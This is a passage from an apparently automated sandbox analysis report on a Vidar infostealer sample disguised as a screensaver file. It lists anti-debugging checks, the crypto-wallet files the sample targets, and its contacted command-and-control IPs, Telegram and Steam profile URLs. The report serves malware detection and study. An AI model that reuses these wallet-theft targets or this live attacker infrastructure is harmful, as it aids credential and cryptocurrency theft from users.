etProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 12_2_29DA8390
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DA2920 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,HeapAlloc,std::_Xinvalid_argument,_memmove,wsprintfA,_memmove,_memmove, 12_2_29DA2920
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DB387C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_29DB387C
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DADF46 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_29DADF46
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DB77BA SetUnhandledExceptionFilter, 12_2_29DB77BA
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Queries volume information: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_pdf4ik.scr_d3ed75eaedbf1e5597eeca0ea8836d4192ee030_201b8dc8_79653cc3-7dca-4c64-8ba1-b09584582b02\Report.wer VolumeInformation Jump to behavior
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 12_2_29DB99E8
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 12_2_29DB9981
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 12_2_29DB98C1
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement, 12_2_29DB1B1C
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: GetLocaleInfoA,wsprintfA,_memset,LocalFree, 12_2_29DA3A68
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,_memset,LocalFree, 12_2_29DA3A00
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 12_2_29DB9A24
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free, 12_2_29DB8DD9
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: GetLocaleInfoA, 12_2_29DB2DBB
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW, 12_2_29DB7E20
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 12_2_29DB817D
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free, 12_2_29DB90C7
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 12_2_29DB95EE
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea, 12_2_29DBD57F
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 12_2_29DB94F9
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 12_2_29DB96F0
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 12_2_29DB9695
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 12_2_29DBD659
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D81190 cpuid 12_2_29D81190
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DA3900 GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime, 12_2_29DA3900
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29DA3900 GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime, 12_2_29DA3900
Source: C:\Users\user\Desktop\pdf_novichki\pdf\pdf4ik.scr Code function: 12_2_29D90880 _memset,_memset,_memset,lstrcatA,lstrcatA,lstrcatA,_memset,SHGetFolderPathA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetUserNameA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,_memset,SHGetFolderPathA,StrStrA,lstrcpyn,wsprintfA,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,StrStrA,lstrcpyn,wsprintfA,lstrcpy,lstrlenA, 12_2_29D90880

Stealing of Sensitive Information
barindex
Yara detected Vidar stealer
Source: Yara match File source: 12.2.pdf4ik.scr.29d80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.pdf4ik.scr.29d80000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.pdf4ik.scr.29adb058.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: pdf4ik.scr PID: 6916, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ElectronCash
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum\wallets\
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Jaxx_Desktop_Old
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: exodus.conf.json
Source: pdf4ik.scr String found in binary or memory: \Exodus\backups
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: info.seco
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \jaxx\Local Storage\
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Ethereum\
Source: pdf4ik.scr String found in binary or memory: \Exodus\backups
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Ethereum"
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: default_wallet
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: file__0.localstorage
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \MultiDoge\
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: seed.seco
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: pdf4ik.scr, 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \Electrum-LTC\wallets\
Yara detected Credential Stealer
Source: Yara match File source: 0000000C.00000002.2416733096.000000000158D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: pdf4ik.scr PID: 6916, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Vidar stealer
Source: Yara match File source: 12.2.pdf4ik.scr.29d80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.pdf4ik.scr.29d80000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.pdf4ik.scr.29adb058.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.2422398802.0000000029ADC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: pdf4ik.scr PID: 6916, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 829691 Sample: pdf_novichki.rar Startdate: 18/03/2023 Architecture: WINDOWS Score: 80 34 Malicious sample detected (through community Yara rule) 2->34 36 Yara detected Vidar stealer 2->36 38 C2 URLs / IPs found in malware configuration 2->38 40 2 other signatures 2->40 6 pdf4ik.scr 12 2->6         started        10 7zG.exe 5 2->10         started        13 OUTLOOK.EXE 46 3 2->13         started        15 OpenWith.exe 16 9 2->15         started        process3 dnsIp4 24 t.me 149.154.167.99, 443, 49732 TELEGRAMRU United Kingdom 6->24 26 116.203.13.130, 49733, 80 HETZNER-ASDE Germany 6->26 42 Antivirus detection for dropped file 6->42 44 Contains functionality to compare user and computer (likely to detect sandboxes) 6->44 17 WerFault.exe 9 6->17         started        22 C:\Users\user\Desktop\...\pdf4ik.scr, PE32 10->22 dropped 28 20.224.151.203, 443, 49724 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 13->28 30 52.109.88.191, 443, 49720 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 13->30 32 192.229.221.95, 49705, 49719, 49727 EDGECASTUS United States 13->32 file5 signatures6 process7 file8 20 C:\ProgramData\Microsoft\...\Report.wer, Unicode 17->20 dropped
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
116.203.13.130
 unknown Germany
24940 HETZNER-ASDE false
20.224.151.203
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
192.229.221.95
 unknown United States
15133 EDGECASTUS false
52.109.88.191
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
149.154.167.99
 t.me United Kingdom
62041 TELEGRAMRU false

Contacted Domains

Name IP Active
t.me 149.154.167.99 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://116.203.13.130/ false
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
https://t.me/zaskullz false
    		high
    http://116.203.13.130/edit.zip false
    • Avira URL Cloud: safe
    		 unknown
    https://steamcommunity.com/profiles/76561199486572327 false
      		high